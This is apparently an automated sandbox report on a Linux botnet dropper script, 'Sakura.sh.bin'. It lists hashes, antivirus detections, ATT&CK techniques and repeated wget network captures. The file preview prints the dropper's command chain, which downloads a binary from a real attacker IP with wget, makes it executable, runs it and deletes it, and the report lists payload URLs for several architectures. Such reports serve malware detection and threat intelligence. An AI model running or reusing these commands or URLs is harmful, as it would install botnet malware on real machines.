Linux Analysis Report
Sakura.sh.bin

Overview

General Information

Sample name: Sakura.sh.bin
Analysis ID: 1641762
MD5: 57f1041fd8cdcbb4c369bb68bfd99db8
SHA1: 15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256: 6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380

Detection

Score: 64
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected ShellDownloader
Executes the "wget" command typically used for HTTP/S downloading
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1641762
Start date and time: 2025-03-18 13:45:01 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Run name: Potential for more IOCs and behavior
Analysis Mode: default
Sample name: Sakura.sh.bin
Detection: MAL
Classification: mal64.troj.linBIN@0/0@0/0
Command: bash "/tmp/Sakura.sh.bin"
PID: 6213
Exit Code:
Exit Code Info:
Killed: True
Standard Output:

Standard Error:
--2025-03-18 07:45:43-- http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:45:46-- (try: 2) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:45:50-- (try: 3) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:45:54-- (try: 4) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:46:00-- (try: 5) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:46:07-- (try: 6) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:46:14-- (try: 7) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:46:23-- (try: 8) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.
  • system is lnxubuntu20
  • bash (PID: 6213, Parent: 6126, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /usr/bin/bash /tmp/Sakura.sh.bin
    • bash New Fork (PID: 6214, Parent: 6213)
    • wget (PID: 6214, Parent: 6213, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://45.135.194.28/m-i.p-s.Sakura
  • cleanup
Source | Rule | Description | Author | Strings
Sakura.sh.bin | JoeSecurity_ShellDownloader | Yara detected ShellDownloader | Joe Security |
No Suricata rule has matched

AV Detection

Source: Sakura.sh.bin, Avira: detected
Source: Sakura.sh.bin, Virustotal: Detection: 64%
Source: Sakura.sh.bin, ReversingLabs: Detection: 70%
Source: /usr/bin/bash (PID: 6214), Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.Sakura
Source: unknown, TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown, TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: global traffic, HTTP traffic detected:
GET /m-i.p-s.Sakura HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 45.135.194.28
Connection: Keep-Alive
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/a-r.m-4.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/a-r.m-5.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/a-r.m-6.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/a-r.m-7.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/i-5.8-6.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/m-6.8-k.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/m-i.p-s.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/m-p.s-l.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/p-p.c-.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/s-h.4-.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/x-3.2-.Sakura;
Source: Sakura.sh.bin, String found in binary or memory: http://45.135.194.28/x-8.6-.Sakura;
Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Source: Yara match, File source: Sakura.sh.bin, type: SAMPLE
Source: classification engine, Classification label: mal64.troj.linBIN@0/0@0/0
Source: /usr/bin/bash (PID: 6214), Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.Sakura
Source: /usr/bin/bash (PID: 6213), Queries kernel information via 'uname'
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | Direct Volume Access | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
    No configs have been found
[Behavior graph: ID 1641762, sample Sakura.sh.bin, start date 18/03/2025, architecture LINUX, score 64. Process chain: bash started, then bash/wget started. Network nodes: 45.135.194.28 (ports 49484, 49486, 49488; SKYLINKCZ, Germany), 109.202.202.202 (port 80; INIT7CH, Switzerland), 2 other IPs or domains. Signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected ShellDownloader.]

Source | Detection | Scanner | Label
Sakura.sh.bin | 65% | Virustotal |
Sakura.sh.bin | 71% | ReversingLabs | Win32.Trojan.Gafgyt
Sakura.sh.bin | 100% | Avira | LINUX/Dldr.Agent.hlw
    No Antivirus matches

    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://45.135.194.28/m-i.p-s.Sakura | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://45.135.194.28/p-p.c-.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/m-p.s-l.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/a-r.m-7.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/x-3.2-.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/m-i.p-s.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/m-6.8-k.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/a-r.m-4.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/a-r.m-5.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/s-h.4-.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/a-r.m-6.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/i-5.8-6.Sakura; | Sakura.sh.bin | false | | unknown
http://45.135.194.28/x-8.6-.Sakura; | Sakura.sh.bin | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
45.135.194.28 | unknown | Germany | 213030 | SKYLINKCZ | false
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false
Match | Associated Sample Name / URL | Detection | Threat Name | Context
109.202.202.202 | kpLwzBouH4.elf | malicious | Unknown | ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43 | GwRba1mTFR.elf | malicious | Unknown |
91.189.91.43 | na.elf | malicious | Prometei |
91.189.91.42 | GwRba1mTFR.elf | malicious | Unknown |
91.189.91.42 | na.elf | malicious | Prometei |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CANONICAL-ASGB | https://paste.ubuntu.com/p/2xjw98FbQJ | malicious | Unknown | 185.125.188.23
CANONICAL-ASGB | 2gkeFl1jcj.elf | malicious | Unknown | 185.125.190.26
CANONICAL-ASGB | GwRba1mTFR.elf | malicious | Unknown | 91.189.91.42
CANONICAL-ASGB | na.elf | malicious | Prometei | 91.189.91.42
INIT7CH | GwRba1mTFR.elf | malicious | Unknown | 109.202.202.202
INIT7CH | na.elf | malicious | Prometei | 109.202.202.202
SKYLINKCZ | na.elf | malicious | Prometei | 45.135.194.29
SKYLINKCZ | boatnet.arm.elf | malicious | Mirai | 45.135.194.29
SKYLINKCZ | networkrip.mips.elf | malicious | Mirai, Gafgyt | 45.135.194.61
SKYLINKCZ | networkrip.armv7l.elf | malicious | Mirai, Gafgyt | 45.135.194.61
SKYLINKCZ | networkrip.x86.elf | malicious | Mirai, Gafgyt | 45.135.194.61
SKYLINKCZ | networkrip.arm4.elf | malicious | Mirai, Gafgyt | 45.135.194.61
SKYLINKCZ | networkrip.ppc.elf | malicious | Mirai, Gafgyt | 45.135.194.61
SKYLINKCZ | networkrip.arm5.elf | malicious | Mirai, Gafgyt | 45.135.194.61
SKYLINKCZ | networkrip.mpsl.elf | malicious | Mirai, Gafgyt | 45.135.194.61
No context
No created / dropped files found
File type: Bourne-Again shell script, ASCII text executable
Entropy (8bit): 4.687336061912351
TrID:
• Linux/UNIX shell script (7007/1) 100.00%
File name: Sakura.sh.bin
File size: 2'098 bytes
MD5: 57f1041fd8cdcbb4c369bb68bfd99db8
SHA1: 15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256: 6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
SHA512: fe018d3aa481c685d6e6b30c982050d33f8901dbe5054ed2d0fa8035353441731fc9255345c454e505492ea075936350bdb33303cdc2d83df2f9f55b80665a56
SSDEEP: 48:vWd8jhttQdMwYnRV7WT68CwIDL1B5NwITxST:vWd8jhttQdMwYnRV7WT68CwIDBB5NwIw
TLSH: BD412BD7119247F32C90DC3772698480F6D4919A9AC6AF4ABEDC3CE448BEDEC7444683
File Content Preview: #!/bin/bash.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.135.194.28/m-i.p-s.Sakura; chmod +x m-i.p-s.Sakura; ./m-i.p-s.Sakura; rm -rf m-i.p-s.Sakura.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.135.194.28/

• Total Packets: 77
• 443 (HTTPS)
• 80 (HTTP)
                                                                      • 45.135.194.28
                                                                      Session ID: 0 | Source IP: 192.168.2.23 | Source Port: 49484 | Destination IP: 45.135.194.28 | Destination Port: 80
                                                                      Timestamp: Mar 18, 2025 13:45:44.270634890 CET | Bytes transferred: 166 | Direction: OUT | Data:
                                                                      GET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      1192.168.2.234948645.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:45:46.947782993 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      2192.168.2.234948845.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:45:50.623742104 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      3192.168.2.234949045.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:45:55.296960115 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      4192.168.2.234949245.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:00.951803923 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      5192.168.2.234949445.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:07.629508972 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      6192.168.2.234949645.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:15.281068087 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      7192.168.2.234949845.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:23.917514086 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      8192.168.2.234950045.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:33.562036037 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      9192.168.2.234950245.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:44.217370987 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      10192.168.2.234950445.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:46:55.909825087 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      11192.168.2.234950645.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:47:07.560295105 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      12192.168.2.234950845.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:47:19.216412067 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      13192.168.2.234951045.135.194.2880
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 18, 2025 13:47:30.875355005 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                      14 | 192.168.2.23 | 49512 | 45.135.194.28 | 80
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Mar 18, 2025 13:47:42.540714025 CET | 166 | OUT | GET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                      15 | 192.168.2.23 | 49514 | 45.135.194.28 | 80
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Mar 18, 2025 13:47:54.200650930 CET | 166 | OUT | GET /m-i.p-s.Sakura HTTP/1.1
                                                                      User-Agent: Wget/1.20.3 (linux-gnu)
                                                                      Accept: */*
                                                                      Accept-Encoding: identity
                                                                      Host: 45.135.194.28
                                                                      Connection: Keep-Alive


                                                                      System Behavior

                                                                      Start time (UTC):12:45:43
                                                                      Start date (UTC):18/03/2025
                                                                      Path:/usr/bin/bash
                                                                      Arguments:/usr/bin/bash /tmp/Sakura.sh.bin
                                                                      File size:1183448 bytes
                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                      Start time (UTC):12:45:43
                                                                      Start date (UTC):18/03/2025
                                                                      Path:/usr/bin/bash
                                                                      Arguments:-
                                                                      File size:1183448 bytes
                                                                      MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                      Start time (UTC):12:45:43
                                                                      Start date (UTC):18/03/2025
                                                                      Path:/usr/bin/wget
                                                                      Arguments:wget http://45.135.194.28/m-i.p-s.Sakura
                                                                      File size:548568 bytes
                                                                      MD5 hash:996940118df7bb2aaa718589d4e95c08